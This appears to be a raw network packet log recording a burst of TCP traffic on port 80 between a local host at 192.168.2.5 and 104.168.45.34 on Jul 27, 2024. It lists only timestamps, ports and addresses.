                                                        Jul 27, 2024 13:31:02.548659086 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.548674107 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.548690081 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.548702002 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.548741102 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.549314976 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.549330950 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.549346924 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.549361944 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.549372911 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.549376965 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.549413919 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.549442053 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.550359011 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550376892 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550391912 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550409079 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550424099 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550430059 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.550440073 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.550465107 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.550493956 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.551400900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.551418066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.551434040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.551450014 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.551465034 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.551486015 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.551521063 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.552436113 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552453995 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552469969 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552494049 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552509069 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552515030 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.552526951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.552536011 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.552561045 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.553281069 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553309917 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553340912 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.553354025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553369045 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553384066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553400040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.553406954 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.553433895 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.554294109 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554311037 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554326057 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554342985 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554351091 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.554358959 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554372072 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.554374933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554392099 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.554413080 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.554431915 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.555264950 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555304050 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555320024 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555335999 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555351019 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555366993 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555377007 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.555382967 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.555404902 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.555440903 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.556289911 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556308031 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556324005 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556340933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556348085 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.556355953 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556371927 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.556385994 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.556426048 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.557312012 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557328939 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557343960 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557360888 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557372093 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.557375908 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557393074 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557406902 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.557408094 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.557446957 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.557475090 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.558305025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558322906 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558337927 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558352947 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558368921 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558377028 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.558386087 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558397055 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.558402061 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.558439970 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.559336901 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559353113 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559369087 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559385061 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559392929 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.559401035 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559415102 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.559417963 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.559457064 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.560182095 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560197115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560211897 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560229063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560237885 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.560245037 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560261011 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560264111 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.560276031 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560290098 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.560302973 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.560323954 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.608509064 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.608618975 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.608716011 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.608860970 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.608877897 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.608915091 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.609265089 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.609282017 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.609297991 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.609318018 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.609355927 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.637679100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.637728930 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.637746096 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.637950897 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638025999 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638042927 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638058901 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638076067 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638098955 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638125896 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638681889 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638699055 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638715029 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638731003 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638741016 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638746977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638762951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.638787985 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.638825893 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.639619112 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639636040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639651060 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639667988 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.639681101 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.639735937 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640125990 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640145063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640160084 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640176058 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640186071 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640192032 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640207052 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.640228033 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.640266895 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641128063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641144037 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641159058 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641175032 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641191006 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641206026 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641221046 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.641227961 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641256094 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.641278982 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642117977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642133951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642149925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642165899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642180920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642193079 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642195940 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642211914 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.642218113 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.642267942 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.643137932 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643153906 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643168926 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643184900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643199921 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643205881 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.643215895 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.643248081 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644108057 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644123077 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644136906 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644153118 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644167900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644167900 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644181967 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644187927 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644197941 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.644233942 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.644262075 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645138025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645153999 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645168066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645184040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645198107 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645212889 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645214081 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645230055 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645241976 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645288944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645921946 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645939112 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645953894 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645970106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.645982027 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.645986080 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646003008 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646018982 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646025896 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646061897 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646089077 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646859884 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646876097 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646889925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646905899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646920919 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646936893 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646936893 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646953106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.646955967 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.646969080 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647002935 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647032022 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647825003 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647840977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647855997 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647874117 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647886038 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647895098 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647908926 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647913933 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647924900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.647936106 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.647977114 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648721933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648739100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648753881 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648770094 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648786068 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648802042 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648802996 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648817062 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648833036 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.648847103 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648868084 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.648894072 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649646997 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649663925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649678946 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649694920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649710894 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649719000 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649727106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649755001 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.649766922 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.649801970 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650513887 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650530100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650544882 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650559902 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650569916 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650576115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.650598049 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.650625944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701441050 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701530933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701548100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701586962 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701741934 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701759100 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.701801062 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.701993942 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.702009916 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.702049017 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.729921103 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.729965925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.729990959 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730207920 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730288982 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730319977 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730336905 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730353117 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730386019 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730519056 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730571032 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.730674028 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730690002 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730705023 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.730736971 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731075048 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731089115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731103897 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731121063 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731137991 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731137991 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731153965 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731168985 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731220961 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731628895 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731683016 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731797934 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731812954 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731828928 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731842995 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731858969 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731863022 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731874943 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731890917 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731901884 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731905937 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.731924057 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.731962919 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.732712984 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.732728958 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.732743979 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.732759953 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.732775927 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.732791901 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.732839108 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.733381033 CEST8049705104.168.45.34192.168.2.5
